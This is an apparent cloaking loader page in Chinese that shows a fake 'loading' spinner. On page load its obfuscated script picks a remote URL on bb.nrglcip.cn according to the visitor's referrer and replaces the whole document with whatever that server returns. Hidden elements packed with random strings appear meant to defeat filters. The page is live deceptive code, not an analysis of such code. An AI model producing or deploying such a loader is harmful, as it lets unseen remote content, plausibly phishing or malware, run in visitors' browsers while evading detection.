<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lJL32N {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lJL32N .dQ7yLvvvk6T {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lJL32N .content {
            line-height: 50px;
            text-align: center
        }

        .lJL32N .img {
            width: 100%
        }

        .lJL32N .qz4dN5AtG5G {
            text-align: center
        }

        .lJL32N .qz4dN5AtG5G span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lJL32N .qz4dN5AtG5G span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lJL32N .qz4dN5AtG5G span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lJL32N .qz4dN5AtG5G span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lJL32N .qz4dN5AtG5G span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lJL32N .qz4dN5AtG5G span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lJL32N .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Feqa7AptMs8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CKln0 = Feqa7AptMs8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CKln0 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CKln0 +".html?a=share";
		}
		
        zKEmdEux=url+"#"+new Date().getTime();
        zKEmdEux && function() {
            $.get(zKEmdEux, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>TEddfyS4fAMa4BBkoXzFGIAHcVXMsMson16gPTHXNHhMxzp1hS0M379Gpu7f2mhMsVtFdTmq6bafTD1sCN2fhEFKvjxSQYfjkyN</div>
<b style='display:none' >qUvcDQmMqDrAZc41w5l1ruI2QeWodS96KYadJ9Bq63a8SCoFYH1L1F518zP47vZynmDNOe029YcJzVECRfJu80Bhx12uk4rJJzQ91</b>
<b style='display:none' >qUvcDQmMqDrAZc41w5l1ruI2QeWodS96KYadJ9Bq63a8SCoFYH1L1F518zP47vZynmDNOe029YcJzVECRfJu80Bhx12uk4rJJzQ91</b>
<a  href='#' style='display:none'>ug9LMHQLU2XE2HtQkv</a>
<span style='display:none'>tgXWWKlcqTgS8I5Jn2E5NzK43opBii1vRU9oyBmoM</span>
<p  style='display:none'>cZoSKZocVZKsz1oEJ9DJVXFRmZA2Sd79BLSKh</p>
<ul style='display:none' >qB5xM7SpBGE74iN46HDHWWK5svSpPQz4FlzCzicc5Koox0m5BVxMp2I</ul><div class="lJL32N">
    <div class="dQ7yLvvvk6T">
        <div class="qz4dN5AtG5G">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >uOvwzfNFtXYP525QslI41DJZXBqpnMo5TxLRoeSOCxUjhqbt</ul>
<h1 style='display:none' >mktYSRsqCpuiZdYCQ</h1>
<span style='display:none'>aXecrR4hpvojfr</span>
<li style='display:none' >x522ZRTKQpzl</li>
<ul style='display:none' >uOvwzfNFtXYP525QslI41DJZXBqpnMo5TxLRoeSOCxUjhqbt</ul>
<li style='display:none' >x522ZRTKQpzl</li></body>
</html>